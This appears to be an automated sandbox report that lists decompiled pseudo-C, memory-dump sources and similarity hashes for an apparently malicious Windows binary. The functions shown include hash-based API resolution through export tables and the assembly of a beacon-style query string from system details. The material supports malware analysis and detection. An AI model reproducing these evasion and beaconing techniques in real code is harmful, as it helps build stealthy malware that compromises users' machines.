                                                                                                                                                                                                                                						if(_t51 != 0) {
                                                                                                                                                                                                                                							_t91 =  *_t93 & 0x0000ffff;
                                                                                                                                                                                                                                							_t83 = _t51 + _t73;
                                                                                                                                                                                                                                							_v16 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                                                                                                                							_v32 = _t83;
                                                                                                                                                                                                                                							_t54 =  *((intOrPtr*)(_t83 + 0x20)) + _t73;
                                                                                                                                                                                                                                							_t84 = 0;
                                                                                                                                                                                                                                							_v12 = _t54;
                                                                                                                                                                                                                                							if(_t91 != 0) {
                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                									_t93 =  &(_t93[1]);
                                                                                                                                                                                                                                									_t81 =  >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff;
                                                                                                                                                                                                                                									_t67 = ( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff;
                                                                                                                                                                                                                                									_t84 = _t84 * 0x00000101 + (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) ^ (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) << 0x00000010;
                                                                                                                                                                                                                                									_t69 =  *_t93 & 0x0000ffff;
                                                                                                                                                                                                                                									_t91 = _t69;
                                                                                                                                                                                                                                								} while (_t69 != 0);
                                                                                                                                                                                                                                								_t54 = _v12;
                                                                                                                                                                                                                                								_t73 = _v8;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t84 == _v20) {
                                                                                                                                                                                                                                								_t85 = _v16;
                                                                                                                                                                                                                                								_t92 = 0;
                                                                                                                                                                                                                                								if(_t85 != 0) {
                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                										_t95 =  *_t54 + _t73;
                                                                                                                                                                                                                                										_v12 = _t54 + 4;
                                                                                                                                                                                                                                										_t56 = 0;
                                                                                                                                                                                                                                										_t71 =  *_t95;
                                                                                                                                                                                                                                										if(_t71 != 0) {
                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                												_t87 = _t71 + 0x00000020 & 0x000000ff;
                                                                                                                                                                                                                                												_t95 = _t95 + 1;
                                                                                                                                                                                                                                												_t77 = _t71 & 0x000000ff;
                                                                                                                                                                                                                                												_t71 =  *_t95;
                                                                                                                                                                                                                                												_t88 =  >=  ? _t77 : _t87;
                                                                                                                                                                                                                                												_t78 =  >=  ? _t77 : _t87;
                                                                                                                                                                                                                                												_t56 = _t56 * 0x00000101 + ( >=  ? _t77 : _t87) ^ ( >=  ? _t77 : _t87) << 0x00000010;
                                                                                                                                                                                                                                											} while (_t71 != 0);
                                                                                                                                                                                                                                											_t73 = _v8;
                                                                                                                                                                                                                                											_t85 = _v16;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										if(_t56 == _v24) {
                                                                                                                                                                                                                                											return  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0x1c)) + ( *( *((intOrPtr*)(_v32 + 0x24)) + _t92 * 2 + _t73) & 0x0000ffff) * 4 + _v8)) + _v8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											goto L13;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                                										L13:
                                                                                                                                                                                                                                										_t54 = _v12;
                                                                                                                                                                                                                                										_t92 = _t92 + 1;
                                                                                                                                                                                                                                									} while (_t92 < _t85);
                                                                                                                                                                                                                                									_t70 = _v28;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                						_t73 =  *((intOrPtr*)(_t70 + 0x18));
                                                                                                                                                                                                                                						_v8 = _t73;
                                                                                                                                                                                                                                					} while (_t73 != 0);
                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L18:
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x736d66b8
                                                                                                                                                                                                                                0x736d66bd
                                                                                                                                                                                                                                0x736d66c0
                                                                                                                                                                                                                                0x736d66c0
                                                                                                                                                                                                                                0x736d66c6
                                                                                                                                                                                                                                0x736d66c8
                                                                                                                                                                                                                                0x736d66cb
                                                                                                                                                                                                                                0x736d66cf
                                                                                                                                                                                                                                0x736d66d1
                                                                                                                                                                                                                                0x736d66d6
                                                                                                                                                                                                                                0x736d66d8
                                                                                                                                                                                                                                0x736d66db
                                                                                                                                                                                                                                0x736d66dd
                                                                                                                                                                                                                                0x736d66e1
                                                                                                                                                                                                                                0x736d66e3
                                                                                                                                                                                                                                0x736d66e9
                                                                                                                                                                                                                                0x736d66ec
                                                                                                                                                                                                                                0x736d66ef
                                                                                                                                                                                                                                0x736d66f2
                                                                                                                                                                                                                                0x736d66f4
                                                                                                                                                                                                                                0x736d66fd
                                                                                                                                                                                                                                0x736d6705
                                                                                                                                                                                                                                0x736d6707
                                                                                                                                                                                                                                0x736d670b
                                                                                                                                                                                                                                0x736d670e
                                                                                                                                                                                                                                0x736d670e
                                                                                                                                                                                                                                0x736d6714
                                                                                                                                                                                                                                0x736d6759
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6716
                                                                                                                                                                                                                                0x736d6716
                                                                                                                                                                                                                                0x736d6719
                                                                                                                                                                                                                                0x736d671a
                                                                                                                                                                                                                                0x736d671e
                                                                                                                                                                                                                                0x736d671e
                                                                                                                                                                                                                                0x736d66cf
                                                                                                                                                                                                                                0x736d66c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6721
                                                                                                                                                                                                                                0x736d6721
                                                                                                                                                                                                                                0x736d6724
                                                                                                                                                                                                                                0x736d6727
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6650
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 0-254546324
                                                                                                                                                                                                                                • Opcode ID: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
                                                                                                                                                                                                                                • Instruction ID: 096cbccc9be851072f62721c72e6a35207eb330dd62d63e2f98fe4aa154a4062
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A419075B005198FDB08CF59C590AA9B7F2FF48310B5581AEDD86DB381DB34E941CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DBD8C() {
                                                                                                                                                                                                                                				signed int _t3;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                				 *0x736efae0 = _t3;
                                                                                                                                                                                                                                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                0x736dbd8c
                                                                                                                                                                                                                                0x736dbd94
                                                                                                                                                                                                                                0x736dbd9c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: 8de22a111113112b989e267035d30f9215d60b857f210bd658361f7c2673790b
                                                                                                                                                                                                                                • Instruction ID: f26cf278488d723bed55618d9e5acc1a2efb0589758c7e644a3b2368a3ca7ffe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8de22a111113112b989e267035d30f9215d60b857f210bd658361f7c2673790b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BA00271541141CB57409F37850D30D359576455D27558555D409C9558EB6445545601
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5c7359a16d6e42bdc1a69f9e1eba68011afaa937c825d97cb989919233356839
                                                                                                                                                                                                                                • Instruction ID: 7bbf4a3866dcc082337cf91270bc49a75d336896604fb03777fe03c38b91db46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7359a16d6e42bdc1a69f9e1eba68011afaa937c825d97cb989919233356839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 432188349086A64BDF52EF7488926E6FFB0BE43A2078D41D9C8D149546E3109457C7C2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a523f35bea89bd8c9ea7c822a3038d770427d481f696069b6045cf1400170718
                                                                                                                                                                                                                                • Instruction ID: 77aea290955c7826e86e8a90b9719a5fa1305ac0b183a2ad1de29c497bdf9710
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a523f35bea89bd8c9ea7c822a3038d770427d481f696069b6045cf1400170718
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C22136395096A68BDB92FF78CCC26E2BBA0FE0272579C4199C890C9692E714D407DB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                                                                                                			E00A8AF14(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				signed int* _t43;
                                                                                                                                                                                                                                				char _t44;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				intOrPtr* _t53;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                                                				long _t66;
                                                                                                                                                                                                                                				signed int* _t80;
                                                                                                                                                                                                                                				signed int* _t82;
                                                                                                                                                                                                                                				void* _t84;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				void* _t89;
                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				void* _t99;
                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t43 = _t84;
                                                                                                                                                                                                                                				_t65 = __ebx + 2;
                                                                                                                                                                                                                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                				_t89 = _t95;
                                                                                                                                                                                                                                				_t96 = _t95 - 8;
                                                                                                                                                                                                                                				_push(_t65);
                                                                                                                                                                                                                                				_push(_t84);
                                                                                                                                                                                                                                				_push(_t89);
                                                                                                                                                                                                                                				asm("cld");
                                                                                                                                                                                                                                				_t66 = _a8;
                                                                                                                                                                                                                                				_t44 = _a4;
                                                                                                                                                                                                                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                					_push(_t89);
                                                                                                                                                                                                                                					E00A8B07F(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                					_t46 = 1;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v12 = _t44;
                                                                                                                                                                                                                                					_v8 = _a12;
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                					_t49 = E00A8B139(_t66);
                                                                                                                                                                                                                                					_t99 = _t96 + 4;
                                                                                                                                                                                                                                					if(_t49 == 0) {
                                                                                                                                                                                                                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                							if(_t53 == 0) {
                                                                                                                                                                                                                                								L8:
                                                                                                                                                                                                                                								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t54 =  *_t53();
                                                                                                                                                                                                                                								_t89 = _t89;
                                                                                                                                                                                                                                								_t86 = _t86;
                                                                                                                                                                                                                                								_t66 = _a8;
                                                                                                                                                                                                                                								_t55 = _t54;
                                                                                                                                                                                                                                								_t106 = _t54;
                                                                                                                                                                                                                                								if(_t106 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									if(_t106 < 0) {
                                                                                                                                                                                                                                										_t46 = 0;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                										E00A8B024(_t55, _t66);
                                                                                                                                                                                                                                										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                										E00A8B07F(_t89, _t66, 0);
                                                                                                                                                                                                                                										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                										E00A8B11B(_t82[2]);
                                                                                                                                                                                                                                										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                										_t66 = 0;
                                                                                                                                                                                                                                										_t86 = 0;
                                                                                                                                                                                                                                										 *(_t82[2])(1);
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                						_t46 = 1;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L13:
                                                                                                                                                                                                                                				return _t46;
                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                0x00a8afc5
                                                                                                                                                                                                                                0x00a8afcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af6c
                                                                                                                                                                                                                                0x00a8af7b
                                                                                                                                                                                                                                0x00a8af7d
                                                                                                                                                                                                                                0x00a8af7e
                                                                                                                                                                                                                                0x00a8af7f
                                                                                                                                                                                                                                0x00a8af82
                                                                                                                                                                                                                                0x00a8af82
                                                                                                                                                                                                                                0x00a8af84
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8afd0
                                                                                                                                                                                                                                0x00a8af88
                                                                                                                                                                                                                                0x00a8af88
                                                                                                                                                                                                                                0x00a8af8c
                                                                                                                                                                                                                                0x00a8af94
                                                                                                                                                                                                                                0x00a8af99
                                                                                                                                                                                                                                0x00a8af9e
                                                                                                                                                                                                                                0x00a8afaa
                                                                                                                                                                                                                                0x00a8afb2
                                                                                                                                                                                                                                0x00a8afb9
                                                                                                                                                                                                                                0x00a8afbf
                                                                                                                                                                                                                                0x00a8afc3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8afc3
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8af84
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af6a
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8af5a
                                                                                                                                                                                                                                0x00a8affa
                                                                                                                                                                                                                                0x00a8b001

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                • Instruction ID: 5aff51eda23d4b19f511c0cfb6f6576f68a4ee91a15b8a52e3364bcbaf4a3512
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4121C8729002049FDB14FF68CCC59ABBBA5FF54350B058169EA568B245E730FD15CBE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D9F85(void* __ecx) {
                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                                                				char _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                                                                                                                                                				_t16 =  *((intOrPtr*)(_t7 + 8));
                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					_t13 = 1;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					E736DBAF4(_t16,  &_v8);
                                                                                                                                                                                                                                					if(_v8 != 1) {
                                                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
                                                                                                                                                                                                                                • Instruction ID: 7273a054672a6eece97baf6a3aedcd4b2ee88a1e72996d9f9a510948a64d63b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E08C32A25228EBCB11CFCDC900E9AF3FCEB09A10B15019AF905D3240D6B1DE00C7C0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A870F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                				void* _v8;
	signed int _v12;
	void* _v16;
	void* _v20;
	void* _v24;
	void* _v28;
	void* __ebx;
	void* __edi;
	long _t59;
	intOrPtr _t60;
	intOrPtr _t61;
	intOrPtr _t62;
	intOrPtr _t63;
	intOrPtr _t64;
	void* _t67;
	intOrPtr _t68;
	int _t71;
	void* _t72;
	void* _t73;
	void* _t75;
	void* _t78;
	intOrPtr _t82;
	intOrPtr _t86;
	intOrPtr* _t88;
	void* _t94;
	intOrPtr _t100;
	signed int _t104;
	char** _t106;
	int _t109;
	intOrPtr* _t112;
	intOrPtr* _t114;
	intOrPtr* _t116;
	intOrPtr* _t118;
	intOrPtr _t121;
	intOrPtr _t126;
	int _t130;
	CHAR* _t132;
	intOrPtr _t133;
	void* _t134;
	void* _t143;
	int _t144;
	void* _t145;
	intOrPtr _t146;
	void* _t148;
	long _t152;
	intOrPtr* _t153;
	intOrPtr* _t154;
	intOrPtr* _t157;
	void* _t158;
	void* _t160;

	_t143 = __edx;
	_t134 = __ecx;
	_t59 = __eax;
	_v12 = 8;
	if(__eax == 0) {
		_t59 = GetTickCount();
	}
	_t60 =  *0xa8d018; // 0x9ad51634
	asm("bswap eax");
	_t61 =  *0xa8d014; // 0x3a87c8cd
	_t132 = _a16;
	asm("bswap eax");
	_t62 =  *0xa8d010; // 0xd8d2f808
	asm("bswap eax");
	_t63 =  *0xa8d00c; // 0x13d015ef
	asm("bswap eax");
	_t64 =  *0xa8d2e0; // 0x105a5a8
	_t3 = _t64 + 0xa8e633; // 0x74666f73
	_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0xa8d02c,  *0xa8d004, _t59);
	_t67 = E00A85C12();
	_t68 =  *0xa8d2e0; // 0x105a5a8
	_t4 = _t68 + 0xa8e673; // 0x74707526
	_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
	_t160 = _t158 + 0x38;
	_t145 = _t144 + _t71;
	_t72 = E00A8508C(_t134);
	_t133 = __imp__; // 0x74785520
	_v8 = _t72;
	if(_t72 != 0) {
		_t126 =  *0xa8d2e0; // 0x105a5a8
		_t7 = _t126 + 0xa8e8cc; // 0x736e6426
		_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
		_t160 = _t160 + 0xc;
		_t145 = _t145 + _t130;
		HeapFree( *0xa8d270, 0, _v8);
	}
	_t73 = E00A86706();
	_v8 = _t73;
	if(_t73 != 0) {
		_t121 =  *0xa8d2e0; // 0x105a5a8
		_t11 = _t121 + 0xa8e8d4; // 0x6f687726
		wsprintfA(_t145 + _a16, _t11, _t73);
		_t160 = _t160 + 0xc;
		HeapFree( *0xa8d270, 0, _v8);
	}
	_t146 =  *0xa8d364; // 0x1ae95b0
	_t75 = E00A86DFA(0xa8d00a, _t146 + 4);
	_t152 = 0;
	_v20 = _t75;
	if(_t75 == 0) {
		L26:
		HeapFree( *0xa8d270, _t152, _a16);
		return _v12;
	} else {
		_t78 = RtlAllocateHeap( *0xa8d270, 0, 0x800);
		_v8 = _t78;
		if(_t78 == 0) {
			L25:
			HeapFree( *0xa8d270, _t152, _v20);
			goto L26;
		}
		E00A8A425(GetTickCount());
		_t82 =  *0xa8d364; // 0x1ae95b0
		__imp__(_t82 + 0x40);
		asm("lock xadd [eax], ecx");
		_t86 =  *0xa8d364; // 0x1ae95b0
		__imp__(_t86 + 0x40);
		_t88 =  *0xa8d364; // 0x1ae95b0
		_t148 = E00A822AB(1, _t143, _a16,  *_t88);
		_v28 = _t148;
		asm("lock xadd [eax], ecx");
		if(_t148 == 0) {
			L24:
			HeapFree( *0xa8d270, _t152, _v8);
			goto L25;
		}
		StrTrimA(_t148, 0xa8c2ac);
		_push(_t148);
		_t94 = E00A82629();
		_v16 = _t94;
		if(_t94 == 0) {
			L23:
			HeapFree( *0xa8d270, _t152, _t148);
			goto L24;
		}
		_t153 = __imp__;
		 *_t153(_t148, _a4);
		 *_t153(_v8, _v20);
		_t154 = __imp__;
		 *_t154(_v8, _v16);
		_t100 = E00A83037( *_t154(_v8, _t148), _v8);
		_a4 = _t100;
		if(_t100 == 0) {
			_v12 = 8;
			L21:
			E00A8651D();
			L22:
                                                                                                                                                                                                                                						HeapFree( *0xa8d270, 0, _v16);
                                                                                                                                                                                                                                						_t152 = 0;
                                                                                                                                                                                                                                						goto L23;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t104 = E00A8145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                                                                                                                					_v12 = _t104;
                                                                                                                                                                                                                                					if(_t104 == 0) {
                                                                                                                                                                                                                                						_t157 = _v24;
                                                                                                                                                                                                                                						_v12 = E00A82EA6(_t157, _a4, _a8, _a12);
                                                                                                                                                                                                                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                                                                                                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                                                                                                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                                                                                                                						_t118 =  *_t157;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                                                                						E00A853BB(_t157);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t106 = _a8;
                                                                                                                                                                                                                                							if(_t106 != 0) {
                                                                                                                                                                                                                                								_t149 =  *_t106;
                                                                                                                                                                                                                                								_t155 =  *_a12;
                                                                                                                                                                                                                                								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                                                                                                                								_t109 = E00A81522(_t149, _t149, _t155 >> 1);
                                                                                                                                                                                                                                								_t148 = _v28;
                                                                                                                                                                                                                                								 *_a12 = _t109;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
